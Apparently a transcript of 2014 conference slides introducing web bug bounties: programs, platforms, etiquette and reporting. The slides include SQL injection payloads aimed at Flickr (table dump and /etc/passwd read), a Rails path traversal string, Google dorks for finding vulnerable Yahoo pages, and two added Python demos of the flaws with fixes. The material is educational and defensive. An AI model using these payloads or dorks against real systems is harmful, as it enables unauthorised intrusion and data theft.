NBT Con December 2014 slides
- 1. Bug Bounty 101
(Web Applications)
BEN SADEGHIPOUR (@NAHAMSEC)
HTTP://NAHAMSEC.COM
- 2. Why bug bounties?
Chances of finding bugs to put on your
resume.
Possibility of getting a job in the
industry.
Opportunity to make money while
attending college.
Fewer security breaches (hopefully).
Better and more secure apps.
More researchers from all over the
world.
More experience.
More bugs.
- 4. What are some popular programs?
Google:
Min. payout: $1337
Acquisitions’ min. payout: $100
Max. payout: $20,000
- 7. What are some popular programs?
Yahoo:
Min. payout: $50
Max. payout: $15,000
- 8. Flickr SQL Injection
PAYLOAD: order_id=-116564954 union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables-- -
- 9. Did I say SQL Injection?
Arbitrary file read from the same injection point (MySQL load_file(), which needs the FILE privilege; this reads files, it does not execute commands)
PAYLOAD: order_id=-116564954 union select load_file("/etc/passwd"),2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
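The two Flickr payloads above both rely on the same defect: the order_id value is concatenated into the query, so a negative id that matches nothing followed by a UNION with the right column count turns the order lookup into a read of whatever the attacker selects. The following is an added, self-contained model of that defect and its fix; it is not code from the slides or from Flickr. It uses an in-memory SQLite database (constructed here) so it runs offline: sqlite_master stands in for MySQL's information_schema.tables, and the MySQL-only load_file() step is not reproduced.

```python
import sqlite3

# Constructed in-memory stand-in for the orders backend on the slide. SQLite is used so the
# example runs offline; MySQL's information_schema.tables becomes sqlite_master here, and
# MySQL-only load_file() has no SQLite counterpart, so the file-read step is not modelled.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, item TEXT, amount REAL)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO orders VALUES (116564954, 'print order', 9.99)")
    conn.execute("INSERT INTO users VALUES (1, 'alice@example.com', 'hash-placeholder')")
    return conn

def lookup_order_vulnerable(conn, order_id):
    # The order_id parameter is concatenated straight into the statement, so anything after
    # the number is parsed as SQL. This is the defect the slide's payload exploits.
    sql = "SELECT id, item, amount FROM orders WHERE id = " + order_id
    return conn.execute(sql).fetchall()

def lookup_order_safe(conn, order_id):
    # Hardened form: coerce to int (any non-numeric payload raises ValueError) and bind the
    # value as a parameter so it can never be interpreted as SQL.
    oid = int(order_id)
    return conn.execute(
        "SELECT id, item, amount FROM orders WHERE id = ?", (oid,)
    ).fetchall()

# The slide's payload rewritten for this 3-column query. The negative id matches no real
# order, so the only row returned is the attacker's UNION row; the UNION must supply exactly
# as many columns as the original SELECT (15 on the slide, 3 here), hence the numeric padding.
# "-- -" comments out whatever the application appends after the injected value.
PAYLOAD = "-116564954 UNION SELECT group_concat(name), 2, 3 FROM sqlite_master-- -"

def demo():
    conn = make_db()
    leaked = lookup_order_vulnerable(conn, PAYLOAD)
    try:
        lookup_order_safe(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "normal": lookup_order_vulnerable(conn, "116564954"),
        "leaked_tables": sorted(leaked[0][0].split(",")) if leaked else [],
        "safe_rejected": rejected,
        "safe_normal": lookup_order_safe(conn, "116564954"),
    }

if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable lookup returning the list of table names instead of an order, while the parameterised version rejects the payload outright and still serves the legitimate id.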
- 10. What are some popular programs?
Facebook:
Min. payout: $500
Max. payout: Unknown (Million dollars?)
Not enough details published by the researcher.
- 11. What are some popular programs?
Microsoft (Online services):
Started on September 23, 2014
Min. payout: $500
Max. payout: Unknown
- 12. What are some popular programs?
GitHub
PayPal and Magento
Twitter
Square
cPanel/WHMCS
Complete list:
https://bugcrowd.com/list-of-bug-bounty-programs
- 14. What are some popular platforms?
BugCrowd
Managed or unmanaged programs
13,300 Researchers from all over the world
155 Bounties.
30,000+ Submissions.
Max Single Payout: $13,000.
- 15. What are some popular platforms?
CrowdCurity
Web application security
Main focus on bitcoin
~1500 Researchers
- 16. What are some popular platforms?
SYNACK
Customer details: unknown.
Number of researchers: unknown.
Requires a written and a practical test.
Focused on Web application as well as:
Host
Mobile
Reverse Engineering
Hardware
- 17. What are some popular platforms?
HackerOne
“Security Inbox”.
1,004 Hackers thanked.
71 Public programs.
$1.58M Bounties paid.
4,987 Bugs fixed
Internet bug bounty:
PHP
Ruby
Apache.
Etc.
- 18. The Basics of Bug Bounties.
Read the program rules.
Scope of the program.
Payout based on bug type.
Requirements
How to get an account on their
platform?
Respect the program’s decisions.
Respect other researchers.
Quality vs Quantity.
Reputation in the industry.
Don’t make any threats.
Don’t ask for money or “swag” if it’s
not mentioned in the rules.
Don’t compare two programs.
Two programs = different budgets.
Don’t lie while comparing two
programs.
Don’t audit without permission.
Legal issues.
- 19. Quality vs Quantity
Most programs have an accurate reputation system
Google.
PayPal.
Facebook
BugCrowd (accuracy).
HackerOne (reputation).
Better reputation = more opportunities:
Private events.
Private Programs.
- 21. Maximizing your payout
Don’t doubt yourself.
You may still be the first to find it.
Check Everything!
Every parameter
Every POST request
User input validation
Forms
Profile pages.
Filters (Can you bypass it?)
Don’t go only for the low-hanging fruit:
Higher payout for critical vulnerabilities.
You may find some low-severity bugs while looking for more critical ones.
Lower chance of duplicates.
- 22. Methodology
Pick a target.
Pick an application.
Pick a vulnerability type.
Google:
site:tw.*.yahoo.com -news -sports -knowledge -house -travel -money -fashion -dictionary -charity -autos -emarketing -maps -serviceplus -screen -tech -mail -talk -bid -uwant -stock -mall -buy -myblog -movies -games -safely -bigdeals -finance -info -mobile -help
- 23. Pick up a pattern
Look for the same parameter, functionality, file type or file name in
the same or other subdomains of the website.
3 SQL injections on Yahoo found by using Google:
site:hk.*.yahoo.com inurl:"id" filetype:html
Try the same idea with other programs.
Profit!
- 24. Picking up a pattern?
(Not my sponsors. Just vulnerable to the same bug)
- 25. Ruby on Rails
File Name Enumeration:
../../../../../../etc/passwd
Possible full path disclosure (FPD)
File not found vs 404? (the difference in response is the existence oracle)
CVE-2014-7829
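The Rails issue on this slide is an existence oracle: a traversal sequence that survives the static handler's path cleaning lets a request learn whether a file outside the web root exists, because the response differs between "found" and "not found". The following is an added example, not the slides' or Rails's own code, that models the bug class in a simplified form (the cleaning step runs on the still-percent-encoded path, so "..%2F" passes through and only becomes "../" after decoding) next to a handler that decodes first and then refuses anything resolving outside the root. The directory layout, file names and the exact ordering bug are constructed for illustration; the real Rails code differs.

```python
import os
import tempfile
from urllib.parse import unquote

def _strip_dot_segments(path):
    # Naive "clean" step: drops "." and ".." segments of the path as received, i.e. before
    # percent-decoding. This is an illustrative simplification of the ordering bug class
    # behind CVE-2014-7829, not Rails's actual implementation.
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/".join(parts)

def static_file_exists_vulnerable(root, request_path):
    # Cleans first, decodes second: "..%2F" is one opaque segment to the cleaner and only
    # turns into "../" inside unquote(), so the filesystem lookup escapes root.
    cleaned = _strip_dot_segments(request_path)
    candidate = os.path.join(root, unquote(cleaned))
    return os.path.isfile(candidate)

def static_file_exists_safe(root, request_path):
    # Decodes first, resolves ".." and symlinks with realpath, then refuses any candidate
    # whose resolved location is not inside the served root.
    decoded = unquote(request_path).lstrip("/")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return False
    return os.path.isfile(candidate)

def demo():
    # Constructed layout: <tmp>/public is the served root, <tmp>/secret.txt sits outside it.
    with tempfile.TemporaryDirectory() as tmp:
        public = os.path.join(tmp, "public")
        os.mkdir(public)
        with open(os.path.join(public, "index.html"), "w") as f:
            f.write("<html></html>")
        with open(os.path.join(tmp, "secret.txt"), "w") as f:
            f.write("outside the web root")
        probes = ["index.html", "../secret.txt", "..%2Fsecret.txt", "..%2Fnope.txt"]
        # For each probe: (vulnerable handler's answer, hardened handler's answer). The
        # True/False split between "..%2Fsecret.txt" and "..%2Fnope.txt" in the vulnerable
        # column is the existence oracle: an attacker sees a different response per probe.
        return {p: (static_file_exists_vulnerable(public, p),
                    static_file_exists_safe(public, p)) for p in probes}

if __name__ == "__main__":
    for probe, (vuln, safe) in demo().items():
        print(f"{probe:20} vulnerable={vuln} safe={safe}")
```

The unencoded "../secret.txt" is stopped by even the naive cleaner, which is why this class of bug is usually found by retrying the same traversal with each segment separator encoded.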
- 26. Making a Report
Be very specific.
Provide step-by-step instructions.
Include all the details needed in order to reproduce the issue.
Provide an attack scenario.
Why is it a big deal?
Can you access major private data?
Are you targeting a single user?
Provide screenshots if needed.
If you create a video, make it accurate, quick, and professional
- 27. Good vs. Bad
Don’t copy and paste others’ published reports
Program #1 by reporter #1 (18 days ago)
- 28. Good vs. Bad
Program #2, Reporter #2 (Reported 11 days ago)
- 31. Public Disclosure
Ask for permission before you publish anything
Varies with each program
BugCrowd – Just ask for each program.
HackerOne – Request public disclosure.
Email.
Some may decide not to disclose the vulnerability due to sensitive
information.
Example Yahoo:
Configurations
Path
Internal IP addresses
Username/Password
- 32. Future of Bug Bounties
More and more companies will start to offer bounties (hopefully!)
Amazon
Apple
eBay
Sony (Surprise!!)
More companies offering money and not “swag”.
Less free bugs.
- 33. Achievements from Bug Bounties
Connections.
Free services from different companies.
Job offer(s).
Some cash.
Lots of experience.
- 34. Learn from your peers!
Read on how others are approaching different vulnerabilities:
@Securatary (http://uzbey.com/bbp-funding)
@FransRosen (http://detectify.com)
@BitQuark (http://bitquark.co.uk)
@Fin1te (http://fin1te.net)
More awesome researchers:
http://Bugcrowd.com/leaderboard
https://www.crowdcurity.com/hall-of-fame
http://Hackerone.com/thanks